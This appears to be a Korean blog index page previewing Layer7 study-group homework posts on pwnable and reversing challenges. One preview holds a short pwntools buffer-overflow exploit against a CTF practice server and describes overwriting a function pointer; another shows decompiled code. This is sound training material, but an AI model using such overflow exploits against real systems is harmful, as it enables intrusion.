전체 글 (32) 썸네일형 리스트형 Layer7 - 포너블 1차시 과제 보호되어 있는 글입니다. Layer7 - 포너블 1차시 수업 문제 3개 전부 합쳐서 실행 한번도 안해보고 5분컷 냈다. ezpzzzlol HackCTF극초반 느낌 난다. bof_basic v5변수만 맞춰주면 풀린다. 음수를 h키 눌러서 hex로 바꾸면 이렇게 되고 0x34-0xc만큼 더미 넣어주고 저 값 넣어주면 된다. from pwn import * r = remote("pwn.scalart.me", 8001) r.sendline(b"a"*(0x34-0xc)+p32(0xDEADBEEF)) r.interactive() bof_basic2 함수포인터 주고 셸함수 주니까 그냥 함수포인터 덮으면 된다. 마찬가지로 버퍼가 ebp-0x8c에 있고 함수포인터가 ebp-0xc에 있으므로 0x8c-0xc만큼 더미 주고 셸함수 주소 넣어주면 된다. from pwn import *.. Layer7 - 리버싱 11차시 과제 prob-3 __int64 __fastcall run_cpu(unsigned __int64 *a1) { __int64 result; // rax __int64 v2; // rsi unsigned __int64 *v3; // rdx unsigned __int64 *v4; // rdx unsigned __int64 *v5; // rdx unsigned __int64 *v6; // rdx unsigned __int64 *v7; // rdx unsigned __int64 *v8; // rdx unsigned __int64 *v9; // rax unsigned __int64 *v10; // rdx unsigned __int64 *v11; // rdx unsigned __int8 v12; // [rsp+9h] [r.. 이전 1 2 3 4 5 6 ··· 11 다음 목록 더보기